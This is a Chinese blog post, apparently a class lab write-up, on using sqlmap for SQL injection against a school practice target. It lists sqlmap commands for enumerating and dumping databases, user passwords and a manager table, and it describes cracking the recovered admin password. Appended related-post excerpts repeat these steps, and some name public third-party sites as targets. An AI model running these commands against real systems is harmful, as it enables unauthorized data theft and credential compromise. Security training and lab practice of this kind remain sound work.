sqlmap实战(靶机)

最新推荐文章于 2025-01-21 17:27:40 发布
最新推荐文章于 2025-01-21 17:27:40 发布
阅读量1.2k 收藏 14
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/108520250
版权

sqlmap攻击学校靶机

sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
python2 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --tamper “base64encode” -v 2 --flush-session --flush-session 清缓存
sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D ‘表’ 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T ‘表’ --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0

在这里插入图片描述
进入学校网页主页
随机点击
使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username”

遇到选择
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
do you want to use common password suffixes? (slow!) [y/N] y
在这里插入图片描述
CTRL+c 终止
username和password都出来了
看见密码中的等号 想到base64 解密
在这里插入图片描述
再使用MD5解码
https://www.somd5.com/

在这里插入图片描述
得到密码

Sweetie_x
关注
sqlmap实战(攻击靶机
weixin_50644630的博客
09-12 1001
sqlmap实战(攻击学校靶机) 进入学校靶机 找到注入点,并放入sqlmap中测试是否可以注入 查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段
SQL 注入之 sqlmap 实战
2301_77160226的博客
08-29 1667
sqlmap 是一款自动化的 SQL 注入工具,它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统,包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测:能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式:支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举:可以枚举数据库的名称、表名、列名和数据。权限提升:尝试提升数据库用户的权限,以获取更高的访问权限。
【每天学会一个渗透测试工具】SQLmap安装教程及使用,黑客技术零基础入门到精通教程!
最新发布
qq_41314882的博客
01-21 938
Sqlmap是一款开源的渗透测试工具🚀下载及安装下载地址:http://sqlmap.org/windows或mac下载第一个,linux下载第二个kali默认自带sqlmap不需要安装解压刚下载好的压缩包后,重命名为sqlmap移动到python目录下复制sqlmap的路径,我的是D:\Python\SQLMap回到桌面,右击新建 > 快捷方式快捷方式名创建成功!右击选择属性,更改起始位置双击sqlmap的快捷图标,输入python sqlmap.py,验证是否安装成功。
sqlmap靶机实战
qq_46485934的博客
09-10 449
一.寻找目标网站的注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
Sqlmap实战
春天不是读书人的博客
08-25 406
以知识盒子为案例,记录基本用法 检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tabl
sqlmap实战(学校靶机
weixin_50401030的博客
09-10 289
进入靶机 打开sqlmap 先找注入点,然后再将网站丢到sqlmap里面测试能不能注入 sqlmap.py -u "http://.../narticle.php?nid=3050" 这里显然是可以注入的,然后再找数据库 sqlmap.py -u "http://.../narticle.php?nid=3050" --dbs 找到数据库看到因为是软件学院所以显然是从rjxy下手找表 sqlmap.py -u "http://.../narticle.ph..
2020-09-10 sqlmap靶机实战
Rosalind_XG的博客
09-17 614
sqlmap靶机实战sql注入 一、寻找注入点 二、sqlmap中 1、查找数据库 sqlmap.py -u "注入点地址" sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” sqlmap.py -u “注入点地址” --dbs sqlmap.py -u “http://117.167.136.244:28026/index/narticle.php?nid=3100” --dbs 如图,得到该站点的全部数据库
sqlmap靶机实战注入
weixin_50644728的博客
09-12 545
1.进入rdctf平台部署网站 将获得的网址放入浏览器搜索框中,进入网站之后随意点进一个页面。 2.检测url是否存在sql注入的风险 window键+R调出命令运行框,切换目录到sqlmap的绝对路径后,输入以下命令,利用sqlmap判断此url是否有sql注入的风险。 python sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3100” 下图表明当前的url中的nid存在SQL注入 3.在输入下面命令获取数据库名
sqlmap实战,攻击学校学院网站(靶机
Marsper的博客
09-10 1855
sqlmap实战,获取学院网站(靶机)管理员密码 首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法 然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 如下图 接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs 运行结果如下 接着选择rjxy数
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 349
用rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
sqlmap实战
中国好利鹏
10-31 1743
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php? id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下, http://www.slibrary.com/link.php?id=321‘ http://www.slibrary.com/link.php?id=321 and 1=1 ht
SQLmap实战
unsurpassed的博客
03-13 751
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 ...
sqlmap测试靶机
weixin_44940180的博客
08-09 508
测试SQL注入 Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49" 可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload 获取数据库信息GET型 1. 获取数据库名字 sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="securit
sqlmap的应用实战
vala0901的博客
05-10 7290
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
【网络安全】sqlmap实战
你在看屏幕的同时,屏幕也在注视着你
04-09 1462
sqlmap实战一、sqlmap配置(1)python27安装(2)sqlmap安装(3)配置环境变量(4)验证是否配置完成二、sqlmap语法(1)常用语法及其说明(2)sqlmap的使用说明三、sqlmap实战实战操作四、总结 一、sqlmap配置 (1)python27安装 python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:\python\python2.7) (2)sqlmap安装 1.sqlmap的 下
SQLMAP使用实战测试
06-12
对于SQLmap的使用教程,挺实用的,详细可能差不多
转载:sqlmap的应用实战
sinolzeng的专栏
02-13 393
原文链接:https://blog.csdn.net/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。 1.首先要知道可以注入的网址是什么 http://www.bible-history.com/subcat.php?id=..
sqlmap实战oracle,网络攻防实战-sqlmap从入门到精通
weixin_39950083的博客
04-14 638
网络攻防实战-sqlmap从入门到精通第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安装sqlmap1.3在kali虚拟机中安装及使用sqlmap1.4在kali上搭建dvwa测试平台1.5在windows上搭建sqlab测试平台第2章sqlmap基础及使用2.1配置sqlmap2.2sqlmap目录及结构2.3SQLMap使用攻略及技巧-已经完...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值